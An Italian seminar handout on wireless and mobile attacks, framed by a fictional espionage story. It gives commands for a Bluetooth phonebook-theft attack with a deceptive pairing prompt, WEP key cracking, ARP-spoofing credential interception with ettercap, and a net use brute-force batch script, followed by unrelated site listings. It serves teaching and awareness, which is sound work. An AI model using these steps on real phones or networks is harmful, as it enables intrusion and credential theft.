HACK ATTACK IL LABORATORIO ATTENZIONE

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "HACK ATTACK IL LABORATORIO ATTENZIONE"

Transcript

1 HACK ATTACK IL LABORATORIO ATTENZIONE I L P R E S E N T E D O C U M E N T O H A SCOPO ESCLUSIVAMENTE DIDATTICO ED INFORMATIVO, L UTILIZZO NON AUTORIZZATO DELLE TECNICHE E M E T O D O L O G I E D I S E G U I T O ILLUSTRATE SU DISPOSITIVI ALTRUI È SEVERAMENTE VIETATO E VIENE PERSEGUITO A NORMA DI LEGGE

2 Introduzione Vogliamo innanzitutto ringraziare i numerosissimi partecipanti presenti alla sessione di laboratorio e per le tante di gradimento che abbiamo ricevuto. Quando abbiamo pensato alla realizzazione del laboratorio, la problematica principale nella quale ci siamo subito imbattuti è stata quella di rendere interessante e leggera la sessione, considerando l orario dell intervento (tardo pomeriggio) e il livello di attenzione dei partecipanti sottoposti ad una intensa giornata di relazioni. Abbiamo così deciso di presentare alcune delle tecniche più spettacolari e degli attacchi più interessanti attraverso la recitazione di una storia immaginaria elaborata però da esperienze professionali realmente accadute. I temi trattati non hanno avuto certamente un approccio tecnico approfondito ma il nostro obiettivo era quello di portare a conoscenza dei partecipanti dell esistenza di tali tecniche e minacce cercando di far capire le modalità di innesco e realizzazione senza entrare nel dettaglio. Questo breve documento ha proprio lo scopo di approfondire tecnicamente quello che vi abbiamo mostrato nel laboratorio del seminario. La storia Arruzzoli e Orlandi sono due consulenti per la sicurezza informatica che collaborano spesso alla realizzazione di soluzioni per la sicurezza ICT di aziende private ed enti governativi. Un giorno ricevono la telefonata di un loro cliente, l amministratore delegato dell AXAN Technology (azienda farmaceutica), il quale gli chiede di recarsi subito al centro ricerche AXAN per cercare di risolvere un grave problema di sicurezza. Orlandi arriva per primo al centro ricerche e chiede informazioni sull accaduto all amministratore. L amministratore gli spiega che alcune ore fà la sicurezza interna ha notato un auto che sostava nel parcheggio privato dell AXAN con all interno una persona che stava utilizzando un computer portatile in modo sospetto. Gli agenti della sicurezza si sono avvicinati e hanno notato che la persona stava utilizzando una macchina virtuale con un sistema operativo client della AXAN ma costui non era un dipendente AXAN né un soggetto autorizzato all utilizzo dei sistemi informatici AXAN; hanno così pregato la persona a seguirli nel centro ricerche per capire meglio quanto stava accadendo. La persona li segue senza opporre resistenza e dopo una verifica effettuata dall amministratore del sistema ICT dell AXAN risulta che l immagine virtuale del client trovata in possesso della persona, apparteneva ad un portatile rubato alcuni mesi prima ad un ricercatore della AXAN. La persona si rifiuta di rispondere alle domande ma alla richiesta di poter visionare il portatile, non fà nessuna obiezione, al contrario, ci tiene che i tecnici AXAN lo esaminino. Questo comportamento ha insospettito l amministratore delegato che vuole cercare di capire cosa realmente può aver fatto quella persona prima di intraprendere qualsiasi azione legale. Orlandi si mette al lavoro e dopo una rapida investigazione scopre che la segretaria dell amministratore conosce quella persona in quanto frequentano entrambi la stessa palestra e si ricorda che una sera spettegolando sui propri capi gli aveva confidato che l amministratore dell AXAN aveva il pallino di conservare le credenziali di accesso nella rubrica dei nomi del suo cellulare confondendoli con i nomi reali. Orlandi chiede all mministratore se aveva notato nei giorni precedenti qualcosa di strano sul suo cellulare e l amministratore risponde che il giorno prima, mentre era in riunione presso un azienda concorrente, ha ricevuto un messaggio che gli comunicava la ricarica di 20 euro sul proprio cellulare, istintivamente ha accettato la ricarica ma successivamente, dopo la riunione, ha verificato che non gli era stata accreditata nessuna ricarica ma non ha fatto caso più di tanto all accaduto, pensando ad un errore del gestore telefonico. Orlandi si fà consegnare il cellulare ed effettua una copia (bitstream image) dell immagine virtuale del client per iniziare l analisi tecnica; nel frattempo arriva

3 Arruzzoli e Orlandi lo aggiorna sui dettagli. Iniziano così ad analizzare tutte le informazioni che sono riusciti a raccogliere per cercare di capire se la persona è riuscita a trafugare informazioni riservate. Analizzando il telefono cellulare Orlandi e Arruzzoli verificano la storia del messaggio di ricarica e dopo un breve controllo sul modello e la versione del software capiscono che il sistema bluetooth poteva essere aggirato tramite apposite tecniche per carpire la rubrica telefonica e lo dimostrano (Bluetooth Attack). Successivamente analizzano il luogo dove si trovava l automobile e notano che il segnale della rete wireless della AXAN è raggiungibile. Analizzando la connessione si accorgono che il sistema wireless utilizza crittografia WEP facilmente attaccabile ed effettuano una dimostrazione pratica (WEP Attack). Una volta entrati nella rete AXAN provano ad immaginare cosa possa aver fatto la persona sospetta e analizzando il file system del client virtuale utilizzato scoprono che la persona aveva installato sia aircrack che ettercap. Il programma aircrack conferma loro la teoria dell accesso alla rete wireless tramite attacco al sistema wep mentre la presenza di ettercap lascia supporre la possibilità che la persona sospetta possa aver carpito tramite questo tool crdenziali di autenticazione a vari sistemi della rete AXAN, quindi provano a ripetere l attacco con ettercap per capire il livello di vulnerabilità presente (MAN IN THE MIDDLE ATTACK). Dal risultato ottenuto con le varie prove, Orlandi ed Arruzzoli si rendono conto delle possibili informazioni che la persona può aver acquisito e cercano di capire dove queste informazioni possano essere state nascoste o inviate. Attraverso i prodotti di Log Management e Network Forensic utilizzati dall AXAN verificano che diverse informazioni riservate sono state scaricate sul client virtuale dai sistemi AXAN ma non risulta nessuna trasmissione all esterno della rete AXAN da quel client. Questo fa supporre ad Arruzzoli ed Orlandi che le informazioni siano ancora presenti nel client o siano state cancellate. Provano prima a verificare se si trovano tracce di file cancellati attraverso l utilizzo combinato dei tool Sleuthkit e Autopsy, ma il risultato è negativo, considerando però la possibilità che la persona sospetta possa aver utilizzato tecniche steganografiche per nascondere le informazioni, Orlandi ed Arruzzoli utilizzano un tool realizzato da loro per verificare l esistenza di eventuali presenze steganografiche conosciute nel file system del client AXAN. Prima analizzano (come possibili contenitori) le immagini presenti nel sistema ma il risultato è negativo ed infine analizzano il file system NTFS: in particolare gli attributi Alternate Data Stream presenti (EHG2- Stegano Tool). l esame risulta positivo, infatti vengono ritrovati ed estratti tre file : brute.bat rubrica.txt pentax.txt Il primo file brute.bat : for /f "tokens=1,2 delims= " %%i in (rubrica.txt) do net use \\AXAN-SRV\c$ %%j /u:%%i è un semplice ma funzionale script che esegue un attacco di forza bruta sfruttando una libreria di username e password presenti nel file rubrica.txt. Analizzando il file rubrica.txt : m.rossi f.bianchi Orlandi ed Arruzzoli si accorgono che le credenziali presenti nel file non sono nient altro che la rubrica telefonica del cellulare dell amministratore delegato. A questo punto risulta chiaro che la persona sospetta nei giorni precedenti aveva effettuato un attacco bluetooth al cellulare dell amministratore copiando i nominativi presenti nella rubrica telefonica e successivamente utilizzandoli per lanciare un attacco di forza bruta nella rete AXAN per accedere ai server AXAN. Il terzo file pentax.txt conferma definitivamente l ipotesi fatta, in quanto contiene informazioni riservate su un nuovo tipo di medicinale prodotto dalla AXAN a cui poteva accedere solo l amministratore delegato con le sue credenziali. Orlandi ed Arruzzoli redigono una relazione tecnica in merito a quanto scoperto all amministratore delegato che intraprende un azione legale. Alcuni giorni dopo si scoprirà che la persona sospetta era stata ingaggiata dalla ditta concorrente per acquisire informazioni riservate sul nuovo prodotto della AXAN. Fine della storia.

4 Strumenti utilizzati Durante il laboratorio sono stati utilizzati diversi tool software su sistemi operativi Linux e Microsoft. In particolare per il Vulnerability Assessement è stato mostrato il prodotto GFiLANguard della GFi gli altri software utilizzati sono presenti in una suite Linux chiamata BackTrack (http://www.remoteexploit.org/backtrack_download.html). BackTrack è un live CD basato su sistema operativo Linux (Slax) che contiene una collezione di tool per la verifica della sicurezza dei sistemi ICT. Per la steganografia è stato realizzato un tool freeware (EHG2-Stegano) che dimostra alcune interessanti tecniche steganografiche. Bluetooth Attack (helomoto) L attacco al bluetooth presentato nella sessione di laboratorio è stato scoperto e realizzato da Adam laurie direttore della Bunker Secure Hosting Ltd ed è stato chiamato helomoto in riferimento ad alcuni modelli di cellulari della Motorola su cui è stato possibile realizzare questo tipo di attacco. Helomoto è una combinazione di tre attacchi : Bluesnarf Bluesnarf è stato identificato da Marcel Holtmann nel settembre del 2003 ed è, probabilmente, il più famoso attacco bluetooth, in quanto ha evidenziato una significativa falla nei sistemi di autenticazione bluetooth. L attaccante deve collegarsi a OBEX Push Profile (OPP), servizio pensato per lo scambio di biglietti da visita elettronici e altre informazioni. Nella maggior parte dei casi, questo servizio non richiede l'autenticazione. L attaccante invia una richiesta GET al servizio OBEX della vittima per conoscere nomi di file noti (ad es. la rubrica : telecom/pb.vcf ), in caso di cattiva esecuzione del firmware del telefono cellulare, il malintenzionato è in grado di recuperare tutti i file il cui nome è noto o sia indovinato correttamente. Bluebug Attacco che permette l accesso, il download non autorizzato della rubrica telefonica, degli sms, la possibilità di inviare SMS ed effettuare chiamate telefoniche attraverso l utilizzo di comandi AT in maniera trasparente al proprietario del cellulare. Social engineering/phishing In alcuni modelli di cellulari la connessione non avviene in maniera automatica, in questo caso si deve indurre l utente ad accettare la connessione, mascherando la richiesta in maniera subdola. Gli strumenti utilizzati per realizzare questo attacco sono un device usb bluetooth, la security suite backtrack e il codice dell exploit helomoto( elomoto.html ). Nel laboratorio per prima cosa abbiamo connesso il device bluetooth usb al portatile e verificato il riconoscimento da parte del sistema operativo tramite il comando : hciconfig

5 successivamente abbiamo attivato il device bluetooth usb con il comando : hciconfig hci0 up Per identificare i device con bluetooth attivo e configurati per essere visibili ad altri dispositivi abbiamo utilizzato il comando : hcitool scan In realtà per poter trovare tutti i device bluetooth disponibili ( visibili e non ) è necessario effettuare una scansione di forza bruta su un range di mac-address, operazione onerosa in termini di tempo; alcuni ricercatori hanno realizzato un sistema hardware e software denominato bluebag che permette la scansione contemporanea di più mac-address ( per saperne di più: ). Per effettuare questo tipo di scansione è possibile utilizzare il tool btscanner presente nella suite backtrack e selezionare l opzione brute force (b) inserendo il range mac-address desiderato. Una volta terminata la scansione e identificato un dispositivo (nel laboratorio del seminario veniva preso come esempio un telefono cellulare della Motorola modello L6) viene effettuato un primo tentativo di connessione attraverso il comando : rfcomm connect 0 < mac-address della vittima> 3 Ident. Device bluetooth Canale bluetooth n.3

6 L interfaccia bluetooth del Motorola presenta due voice gateways uno richiede l autenticazione di accoppiamento (pairing) l altro no, nello specifico l Headset Audio Gateway presente sul canale 3 non la richiede fino a quando non viene effettuata la connessione. Tuttavia il device dell attaccante deve essere presente nella history list del device vittima, altrimenti non potrà connettersi al canale 3. L esecuzione del codice helomoto.c, precedentemente compilato, sul canale 8 risolve questo problema : helomoto plant < mac-address della vittima> 8 A questo punto è necessario indurre l utente ad accettare la connessione, per fare questo si prepara attraverso la configurazione del nome dell interfaccia bluetooth un messaggio subdolo che induca l utente a concedere la connessione : hciconfig hci0 name `perl -e 'print "SchedaSIM\x0dNonAttiva\x0dAttivare?\x0d\x0d"'` e ripetiamo il comando : rfcomm connect 0 < mac-address della vittima> 3 Il device della vittima visualizzerà il messaggio : SchedaSIM NonAttiva Attivare? Se viene accettata la connessione, l attaccante potrà interagire con i comandi AT sul device della vittima con un programma terminal configurando il device usb come una porta seriale (ad es. Cutecom) :

7 WEP Attack Il WEP (Wired Equivalent Privacy) è un algoritmo opzionale dello standard IEEE b, che effettua la crittografia del dato prima che venga irradiato nell'etere. Il WEP utilizza un algoritmo RC4 con chiave a 64 bit, 128 e 256 bit. L'aumento delle velocità di trasmissione e le relative piccole dimensioni dei Vettori di Inizializzazione (IV: stringhe di bit usate per rendere casuale parte della chiave) utilizzate nel WEP, fanno sì che in condizioni di traffico normale sia possibile per un attaccante ottenere la chiave di codifica, e quindi l accesso alla rete e alle informazioni trasmesse in un lasso di tempo relativamente breve (un paio d ore). L aumento dei bit di codifica serve solo a ritardare l'accesso alla rete da parte di un attaccante (sarebbe più indicato un cambio frequente della chiave wep). Nel laboratorio del seminario si è utilizzato il tool aricrack-ng per effettuare l attacco ad una rete WEP a 128 bit. Gli strumenti utilizzati per realizzare questo attacco sono una scheda di rete Prism2 con dei driver aggiornati per permettere l injection dei pacchetti (per saperne di più: e la security suite backtrack. L attacco viene portato in 4 fasi Fase 1 Scanning Si effettua una scansione per identificare eventuali reti, su che canale sono e se ci sono client connessi; per fare questa operazione eseguiamo il comando : airodump-ng <interfaccia> (ad es. airodump-ng eth1) Una volta identificata la rete vengono selezionate le seguenti informazioni: BSSID dell AP (mac-address Access Point) ESSID dell AP (nome identificativo Access Point) Channel (il numero del canale di trasmissione) SSID dei client connessi (mac address dei client) BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:E0:XX:XX:XX:XX WEP WEP AXAN-AP12 BSSID STATION PWR Lost Packets Probes 00:E0:XX:XX:XX:XX 00:0E:35:XX:XX:XX AXAN-AP12

8 Fase 2 Acquisizione dei pacchetti IV Eseguiamo nuovamente airodump-ng con i seguenti paramentri: airodump-ng -c <canale> -b <BSSID> -w <file.ivs> <interfaccia> esempio : airodump-ng --bssid 00:E0:XX:XX:XX:XX -c 6 --write axan-ap12.dump eth1 In questo modo effettuiamo la cattura dei pacchetti IV sul file axan-ap12.dump. Per effettuare la crittanalisi e quindi individuare la chiave, dobbiamo archiviare circa pacchetti IV (varia in base al numero di bit utilizzati per la crittografia). Per diminuire il tempo di attesa è necessario generare del traffico che permetta di acquisire più pacchetti possibili nel minor tempo, quindi si utilizza il tool aireplay-ng. Questo tool dispone di varie funzionalità, nel nostro caso lo imposteremo con il parametro -3 che di fatto lo rende un generatore di richieste ARP, ad ogni richiesta la base (ad es. l Access Point AXAN-AP12) genera un nuovo vettore di inizializzazione. Il comando viene impostato con i seguenti parametri aireplay-ng -3 -b 00:E0:XX:XX:XX:XX -h 00:0E:35:XX:XX:XX eth1 Mac-address AXAN-AP12 Mac-address di un client connesso Fase 3 Analisi dei pacchetti IV Con aircrack-ng si analizzano i pacchetti IV per decifrare la chiave. Apriamo un nuova console ed eseguiamo il comando : aircrack-ng <file.ivs> Il tempo varia anche in base alla lunghezza della password.

9 Raggiunto il numero di pacchetti sufficienti l algoritmo riesce a trovare la chiave. Fase 4 Configurazione della scheda di rete A questo punto si inserisce la chiave nella configurazione della scheda di rete wireless con il comando : iwconfig eth1 mode Managed Key 1A:43:DC:BB:4C:9D:8B:47:C5:47:CC:55:CD nella maggior parte dei casi è sufficiente eseguire una richiesta dhcp sull interfaccia di rete wireless per ottenere i parametri di configurazione e quindi accedere alla rete: dhcpcd eth1 Man In The Middle attack (MITM) Il MITM è un attacco nel quale l'attaccante è in grado di leggere, inserire o modificare a piacere, le informazioni che vengono scambiate tra due parti senza che nessuna delle due sia in grado di sapere se il collegamento sia stato compromesso. L'attaccante deve essere in grado di osservare e intercettare il transito delle informazioni tra le due vittime. Nel laboratorio del seminario è stato dimostrato come attraverso l uso del tool software ettercap sia possibile per un attaccante connesso ad una rete effettuare un atttacco MITM e carpire informazioni relative alle credenziali degli utenti presenti sulla medesima rete. Per realizzare questo attacco è stata utilizzata la security suite backtrack che contiene il tool software ettercap.

10 Una volta avviato il tool ettercap per prima cosa è necessario selezionare l interfaccia di rete su cui si vuole analizzare il traffico. Una volta selezionata, il menu di ettercap mostrerà ulteriori funzionalità. A questo punto si deve effettuare uno scanning della rete per individuare i computer attivi. A tutti i computer individuati, ettercap, invierà un arp spoofing impostando l opzione Sniff remote connections nel menu Mitm:

11 Una volta attivato ( dal menu Start->Start Sniffing), Ettercap comincerà ad inviare delle richieste arp ad ogni singolo computer individuato, associando il proprio mac-address con tutti gli altri indirizzi dei computer attivi. In questo modo tutte le richieste effettuate dai computer verso altri computer saranno dirottate prima verso l attaccante e solo successivamente saranno redirette al vero destinatario; in questo modo l attaccante ha modo di analizzare ed eventualmente manipolare le informazioni. Lista arp di un client prima dell arp spoofing Lista arp di un client dopo dell arp spoofing In modalità sniffing, ettercap analizza tutto il traffico e quando individua la trasmissioni di credenziali le filtra e le memorizza. E interessante notare la capacità di ettercap di acquisire le credenziali trasmesse anche su canali SSL. In particolare nel caso ettercap trasmette al client un falso certificato digitale che utilizza successivamente per decriptare le credenziali inviate, il tutto in maniera trasparente all utente:

12 Esempi di Steganografia ( EHG2-Stegano Tool ) Il tool utilizzato nel laboratorio del seminario è stato realizzato dall EHG2 (Ethical Hacker Guardian Group) un gruppo di ricerca fondato da Francesco Arruzzoli e Cristiano Orlandi che ha lo scopo di analizzare ed approfondire la conoscenza sulle nuove tecnologie, in particolare sulla loro applicazione, sicurezza ed affidabilità in ambito ICT. Steganografia con le Immagini Steganografia realizzata con gli Alternate Data Stream Il tool permette di utilizzare due tecniche di steganografia quella applicata alla possibilità di inserie inserire un file generico dentro immagini Bitmap utilizzando l algoritmo LSB (Least Significant Bit) algoritmo di inserimento nel bit meno significativo e quella che utilizza la proprietà Alternate Data Stream presente nel file system NTFS dei sistemi operativi Microsoft. Utilizzo del tool con la metodologia LSB Selezionare la Tab LSB Image Steganography successivamente la sotto tab Encrypt. Premere il pulsante Select image.. per selezionare l immagine contenitore e il pulsante Select File.. per selezionare il file da inserire nell immagine contenitore.

13 L indicatore Container Capacity indicherà la % occupata dal file nell immagine contenitore. Per generare l immagine bmp con il file steganografato premere il pulsante Execute Steganography. Per estrarre un file steganografato dall immagine contenitore selezionare la Tab LSB Image Steganography la successivamente la sotto tab Decrypt. Premere il pulsante Select Image.. e selezionare l immagine contenitore, il nome del file nascosto e le sue dimensioni appariranno nella sezione File Contained. Per estrarre il file è sufficiente premere il pulsante Extract File >>.

14 Utilizzo del tool con gli Alternate Data Stream Selezionare la Tab Alternate Data Stream Steganography,selezionare il file contenitore a cui associare il file nascosto tramite ADS, premendo il pulsante relativo alla casella di testo Select file to link ADS, successivamente premere il pulsante relativo alla casella di testo Copy file to an existing ADS per associare il file da nascondere, oppure selezionando l opzione Create a text ADS file è possibile creare un file di testo da associare, semplicemente inserendo il nome del file nella casella di testo ADS file name e il testo da nascondere nella casella di testo Text Content. Per creare l ADS premere il pulsante Make ADS. E possibile associare più file ADS allo stesso file contenitore. Anche cambiando il nome al file contenitore il link ai file ADS rimane ma si perde se viene effettuata una copia su un altro file system.

15 Per ricercare gli ADS presenti nel file system inserire il percorso di ricerca iniziale nella casella di testo Search Path e premere il pulsante Search ADS. Eventuali file ADS saranno visualizzati nella lista Found Files; per aprire, estrarre o eliminare il file ADS selezionarlo dalla lista, premere il plusante destro del mouse e selezionare l opzione desiderata sul menù che appare. Quello che non avete visto ma che è accaduto Durante lo svolgimento del laboratorio, al di là di problemi tecnici tipici della diretta come il filmato iniziale che dalla sala regia stentava a partire o le luci che non si accendevano, per assicurarci la miglior riuscita delle dimostrazioni e ipotizzando la possibilità che qualcuno dal pubblico per spirito goliardico potesse tentare di interferire in qualche modo, abbiamo creato delle Honeypot (in breve: dispositivo che funge da specchietto per le allodole ) per i dispositivi wireless alfine di deviare l attenzione da quelli realmente utilizzati. Il risultato è stato sorprendente nei primi dieci minuti di laboratorio abbiamo registrato sulla Honeypot relativa ai dispositivi bluetooth 5 tentativi di attacco e diversi download dei file civetta. Avremmo voluto discuterne alla fine del seminario ma purtroppo per motivi di tempo non abbiamo potuto, sarebbe stato un interessante approfondimento. Nel ringraziarvi nuovamente per l interesse e la partecipazione, speriamo che il presente documento sia un utile compendio a quanto visto durante il seminario. Distinti Saluti Francesco Arruzzoli (DiNets srl) Cristiano Orlandi (Winitalia)

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic

Dettagli

CHIAVETTA INTERNET ONDA MT503HSA

CHIAVETTA INTERNET ONDA MT503HSA CHIAVETTA INTERNET ONDA MT503HSA Manuale Utente Linux Debian, Fedora, Ubuntu www.ondacommunication.com Chiavet ta Internet MT503HSA Guida rapida sistema operativo LINUX V 1.1 33080, Roveredo in Piano (PN)

Dettagli

Configurazioni Mobile Connect

Configurazioni Mobile Connect Mailconnect Mail.2 L EVOLUZIONE DELLA POSTA ELETTRONICA Configurazioni Mobile Connect iphone MOBILE CONNECT CONFIGURAZIONE MOBILE CONNECT PER IPHONE CONFIGURAZIONE IMAP PER IPHONE RUBRICA CONTATTI E IPHONE

Dettagli

CARATTERISTICHE DELLE CRYPTO BOX

CARATTERISTICHE DELLE CRYPTO BOX Secure Stream PANORAMICA Il sistema Secure Stream è costituito da due appliance (Crypto BOX) in grado di stabilire tra loro un collegamento sicuro. Le Crypto BOX sono dei veri e propri router in grado

Dettagli

COPERTURA WI-FI (aree chiamate HOT SPOT)

COPERTURA WI-FI (aree chiamate HOT SPOT) Wi-Fi Amantea Il Comune di Amantea offre a cittadini e turisti la connessione gratuita tramite tecnologia wi-fi. Il progetto inserisce Amantea nella rete wi-fi Guglielmo ( www.guglielmo.biz), già attivo

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

Guida all uso del portale dello studente

Guida all uso del portale dello studente Guida all uso del portale dello studente www.studente.unicas.it Versione 1.0 del 10/04/2010 Pagina 1 Sommario PREMESSA... 3 PROFILO... 7 AMICI... 9 POSTA... 10 IMPOSTAZIONI... 11 APPUNTI DI STUDIO... 12

Dettagli

Progetto Istanze On Line

Progetto Istanze On Line 2011 Progetto Istanze On Line 21 febbraio 2011 INDICE 1 INTRODUZIONE ALL USO DELLA GUIDA... 3 1.1 SIMBOLI USATI E DESCRIZIONI... 3 2 PROGETTO ISTANZE ON LINE... 4 2.1 COS È E A CHI È RIVOLTO... 4 2.2 NORMATIVA

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard Payment Card Industry (PCI) Data Security Standard Procedure per la scansione di sicurezza Versione 1.1 Release: settembre 2006 Indice generale Finalità... 1 Introduzione... 1 Ambito di applicazione dei

Dettagli

Configuration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1

Configuration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1 Tutorial Configuration Managment Configurare il servizio EC2 su AWS Pagina 1 Sommario 1. INTRODUZIONE... 3 2. PROGRAMMI NECESSARI... 4 3. PANNELLO DI CONTROLLO... 5 4. CONFIGURARE E LANCIARE UN ISTANZA...

Dettagli

Note e informazioni legali

Note e informazioni legali Note e informazioni legali Proprietà del sito; accettazione delle condizioni d uso I presenti termini e condizioni di utilizzo ( Condizioni d uso ) si applicano al sito web di Italiana Audion pubblicato

Dettagli

Progetto Istanze On Line

Progetto Istanze On Line 2014 Progetto Istanze On Line 09 aprile 2014 INDICE 1 INTRODUZIONE ALL USO DELLA GUIDA... 3 1.1 SIMBOLI USATI E DESCRIZIONI... 3 2 GESTIONE DELL UTENZA... 4 2.1 COS È E A CHI È RIVOLTO... 4 2.2 NORMATIVA

Dettagli

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D Se avete un tablet android, ma non avete la minima idea di come accenderlo, usarlo e avviarlo, seguite queste nostre indicazioni 1. ATTIVAZIONE

Dettagli

Guida alle impostazioni generali

Guida alle impostazioni generali Istruzioni per l uso Guida alle impostazioni generali 1 2 3 4 5 6 7 8 9 Collegamento della macchina Impostazioni di sistema Impostazioni Copiatrice/Document server Impostazioni fax Impostazioni Stampante

Dettagli

Cosa fare in caso di perdita di smartphone o tablet

Cosa fare in caso di perdita di smartphone o tablet OUCH! Ottobre 2012 IN QUESTO NUMERO Introduzione Le precauzioni da prendere Cosa fare in caso di smarrimento o furto Cosa fare in caso di perdita di smartphone o tablet L AUTORE DI QUESTO NUMERO Heather

Dettagli

Procedura per il ripristino dei certificati del dispositivo USB

Procedura per il ripristino dei certificati del dispositivo USB Procedura per il ripristino dei certificati del dispositivo USB 30/04/2013 Sommario - Limitazioni di responsabilità e uso del manuale... 3 1 Glossario... 3 2 Presentazione... 4 3 Quando procedere al ripristino

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it FIRESHOP.NET Gestione Utility & Configurazioni Rev. 2014.3.1 www.firesoft.it Sommario SOMMARIO Introduzione... 4 Impostare i dati della propria azienda... 5 Aggiornare il programma... 6 Controllare l integrità

Dettagli

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO CLSMS SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO Sommario e introduzione CLSMS SOMMARIO INSTALLAZIONE E CONFIGURAZIONE... 3 Parametri di configurazione... 4 Attivazione Software...

Dettagli

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4)

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4) Guida al nuovo sistema di posta CloudMail UCSC (rev.doc. 1.4) L Università per poter migliorare l utilizzo del sistema di posta adeguandolo agli standard funzionali più diffusi ha previsto la migrazione

Dettagli

MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A

MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A Leggere attentamente questo manuale prima dell utilizzo e conservarlo per consultazioni future Via Don Arrigoni, 5 24020 Rovetta

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

Guida alla scansione su FTP

Guida alla scansione su FTP Guida alla scansione su FTP Per ottenere informazioni di base sulla rete e sulle funzionalità di rete avanzate della macchina Brother, consultare la uu Guida dell'utente in rete. Per ottenere informazioni

Dettagli

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads.

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads. MailStore Proxy Con MailStore Proxy, il server proxy di MailStore, è possibile archiviare i messaggi in modo automatico al momento dell invio/ricezione. I pro e i contro di questa procedura vengono esaminati

Dettagli

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili 2012 NETGEAR, Inc. Tutti i diritti riservati. Nessuna parte della presente pubblicazione può essere riprodotta, trasmessa, trascritta,

Dettagli

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:... INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...14 Ultimo Aggiornamento del Documento: 23 / Marzo / 2012 1 INFORMAZIONI

Dettagli

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI 2 Introduzione Questa email è una truffa o è legittima? È ciò che si chiedono con sempre maggiore frequenza

Dettagli

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP Protocolli di rete Sommario Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP Configurazione statica e dinamica

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

Guida all utilizzo del dispositivo USB

Guida all utilizzo del dispositivo USB Guida all utilizzo del dispositivo USB 30/04/2013 Sommario - Limitazioni di responsabilità e uso del manuale... 3 1. Glossario... 3 2. Guida all utilizzo del dispositivo USB... 4 2.1 Funzionamento del

Dettagli

12.5 UDP (User Datagram Protocol)

